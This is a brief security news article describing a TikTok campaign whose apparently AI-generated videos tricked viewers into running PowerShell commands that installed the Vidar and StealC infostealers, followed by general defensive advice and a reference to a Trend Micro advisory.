Malware Delivered Via AI-Generated TikTok Videos
In a recent development, a new malware campaign has been identified on TikTok, spreading information-stealing malware such as Vidar and StealC. The campaign, which operates entirely within the popular social media platform, has been traced to several accounts: @gitallowed, @zane.houghton, and @digitaldreams771. However, these accounts have since become inactive.
The malware chain begins with a script downloaded from allaivo[.me], which subsequently fetches and installs Vidar or StealC. The commands are never embedded in text or links, making them harder for traditional security systems to detect. This stealthy approach increases the risk that many users may have inadvertently followed the instructions and infected their systems.
One video, which gained nearly 500,000 views and over 20,000 likes, instructed users to execute PowerShell commands. These commands initiated a malware infection chain, coaxing viewers into unwitting participants in the malware installation. The videos from these accounts had minor variations in camera angles and payload URLs, suggesting automation was used in their creation.
The malicious PowerShell script hides files in user directories, adds them to Windows Defender's exclusion list, downloads malware from amssh[.co], uses retry logic, sets up system persistence, cleans up forensic evidence, and masks its command-and-control (C2) infrastructure by embedding IP data in services like Steam and Telegram.
To counter this threat, organizations are advised to actively monitor social media platforms for high-engagement posts containing technical instructions, as these may be linked to malicious activity. Implementing behavioral detection tools is essential to flag unusual user actions, such as unexpected command-line executions.
Moreover, user education must evolve to include guidance on recognizing and reporting deceptive video content, especially those that exploit social engineering tactics through visual and auditory cues. The popularity of the video underscores the need for updated defense strategies that go beyond traditional threat detection.
Trend Micro has issued an advisory on this latest social engineering effort, urging users to exercise caution when interacting with unfamiliar content on social media platforms. As always, it is crucial to maintain a robust security posture to protect against such threats.
